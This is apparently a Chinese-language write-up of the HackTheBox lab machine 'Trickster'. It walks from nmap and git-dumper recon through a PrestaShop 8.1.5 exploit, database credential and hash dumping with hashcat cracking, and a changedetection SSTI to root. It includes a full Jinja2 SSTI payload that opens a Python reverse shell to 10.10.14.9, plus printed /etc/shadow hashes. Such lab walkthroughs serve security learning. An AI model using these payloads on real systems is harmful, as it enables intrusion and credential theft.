基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.34
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-23 13:32 CST
Nmap scan report for 10.10.11.34
Host is up (0.097s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://trickster.htb/
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.03 seconds

80

需要加hosts:

1
10.10.11.34 trickster.htb

一个官网主页,SHOP那里是子域名:

SHOP

添加hosts后访问,在线商城,页面底部信息可以知道使用了prestashop:

目录扫描

常规目录扫描,主站没什么东西,shop发现git泄漏:

1
2
3
4
5
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://trickster.htb/  --exclude-length 278

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://shop.trickster.htb/  --exclude-length 283

/.git/HEAD            (Status: 200) [Size: 28]

git

那就dump下来检查:

1
git-dumper http://shop.trickster.htb/.git/ shop_git

得到admin路径,访问也得到了prestashop版本8.1.5:

1
admin634ewutrx1jgitlooaj

prestashop

搜索可以找到相关漏洞:

根据实际情况修改代码中的路径端口之类的,以及修改zip文件中的shell php,然后运行exp,等待触发,得到www-data:

1
python3 exploit.py http://shop.trickster.htb miao@miao.com miao exploit.html

信息

然后常规翻文件,得到数据库账号密码:

1
2
3
4
5
6
7
/var/www/prestashop/app/config/parameters.php

'database_host' => '127.0.0.1',
'database_port' => '',
'database_name' => 'prestashop',
'database_user' => 'ps_user',
'database_password' => 'prest@shop_o',

数据库中继续翻信息得到一些hash:

1
2
3
4
mysql --user=ps_user --password='prest@shop_o' prestashop -e "select email,passwd from ps_employee"

admin@trickster.htb	$2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C
james@trickster.htb	$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm

其中james的hash可以破解出密码:

1
2
3
sudo hashcat -m 3200 hash.txt ~/Tools/dict/rockyou.txt

alwaysandforever

user flag

james用户密码复用,ssh登录:

Docker

查看ip发现还有一个docker的172.17.0.1,枚举docker可以发现172.17.0.1的5000端口,转发出来查看:

1
ssh james@10.10.11.34 -L 5555:172.17.0.2:5000

是一个changedetection 0.45.20,james的密码可以登录:

changedetection

搜索可以发现changedetection的漏洞:

脚本没设置密码选项,根据代码手动利用即可:

添加新更改->edit&watch,监测网址设置成宿主机的,后面控制更改,例如http://172.17.0.1:8000

通知网址设置为get://10.10.14.9,通知正文SSTI Payload

1
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.9\",4445));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}{% endif %}{% endfor %}

设置完成后保存,然后到宿主机的我们设置的8000端口监听服务那里,完成任意更改,然后回到检测这里重新检测网站,触发SSTI,得到容器root:

提权信息 & root flag

容器内history可以看到一个疑似密码的,就是宿主机root密码:

1
#YouC4ntCatchMe#

shadow

1
2
3
4
root:$y$j9T$QrqZSRjwrjBfK8HexlK4d/$ng0E/9GWnWgXHLc1TSOBShK3ykz95fGBSVzzw6tiQl2:19968:0:99999:7:::
james:$y$j9T$nFUssQJghJkY44BaQM2aD1$E9pJTfQ5CwEkaU/7O07HAh.4UsM1lOhKHqyRP1XEtL4:19868:0:99999:7:::
adam:$y$j9T$BUeIuw29kb15rDAz8ZXOt/$WG54Q2KcL9UI.zK0r2WaeXb6zUQioT1HBxJ0TfjF736:19868:0:99999:7:::
runner:$y$j9T$1GBk1cQSxkwCXeThdrzvp.$.q2JbGTK0oFJG0aMtLjaVoRiv5419bO0gOC9mTJO2iB:19975:0:99999:7:::

参考资料